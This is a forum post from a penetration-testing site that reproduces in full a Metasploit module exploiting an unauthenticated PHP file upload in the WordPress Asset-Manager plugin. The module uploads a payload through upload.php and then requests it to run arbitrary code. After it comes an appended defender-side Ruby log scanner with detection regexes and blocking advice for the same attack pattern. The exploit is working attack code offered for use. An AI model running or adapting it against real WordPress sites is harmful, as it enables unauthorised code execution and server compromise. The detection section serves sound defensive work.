China Network Penetration Testing Alliance

Title: WordPress Asset-Manager PHP File Upload Vulnerability

Author: admin    Time: 2012-12-31 09:22
Title: WordPress Asset-Manager PHP File Upload Vulnerability
This module, taken from the Metasploit exploit library, exploits a vulnerability found in the WordPress Asset-Manager plugin version 2.0 and below. It allows PHP files to be uploaded: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; upload.php reads the file from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The uploaded file lands in a web-reachable temp directory
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
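A defender-side check for the exploitation pattern this module relies on, added here as an example that is not part of the original post or of the Metasploit module: it scans constructed Apache combined-format access-log lines for a successful unauthenticated POST to the plugin's upload.php followed by a GET of a .php file under wp-content/uploads/assets/temp/ from the same client. The log format, IP addresses, file names and the 300-second correlation window are assumptions.

```ruby
require 'time'

# Constructed sample log lines (combined format); not real traffic.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:22:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:22:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kdqzt.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:25:10 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:30:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/shell.php HTTP/1.1" 404 0 "-" "curl/7.26"
LOG

LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/
UPLOAD_RE   = %r{/wp-content/plugins/asset-manager/upload\.php\z}i
TEMP_PHP_RE = %r{/wp-content/uploads/assets/temp/[^/]+\.php\d*\z}i   # .php, .php5, ...

def parse_line(line)
  m = LINE_RE.match(line)
  return nil unless m
  { ip: m[:ip], ts: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path].sub(/\?.*/, ''), status: m[:status].to_i }
end

# Any GET for a .php file in the plugin's temp upload directory is suspicious on its own
# (the directory should only hold uploaded assets). A successful POST to upload.php from
# the same IP within `window` seconds before a successful GET is rated :critical.
def detect(log, window: 300)
  events  = log.each_line.map { |l| parse_line(l) }.compact
  uploads = events.select { |e| e[:method] == 'POST' && e[:path] =~ UPLOAD_RE && e[:status] == 200 }
  alerts  = []
  events.each do |e|
    next unless e[:method] == 'GET' && e[:path] =~ TEMP_PHP_RE
    chained  = uploads.any? { |u| u[:ip] == e[:ip] && (e[:ts] - u[:ts]).between?(0, window) }
    severity = if chained && e[:status] == 200 then :critical
               elsif e[:status] == 200         then :high
               else                                 :medium
               end
    alerts << { ip: e[:ip], path: e[:path], status: e[:status], severity: severity }
  end
  alerts
end

if __FILE__ == $0
  detect(SAMPLE_LOG).each { |a| puts "#{a[:severity].to_s.upcase} #{a[:ip]} #{a[:status]} #{a[:path]}" }
end
```

The same two regexes can be fed to a WAF or web-server rule to block POSTs to upload.php outright and to deny execution of .php files under wp-content/uploads/.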





Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2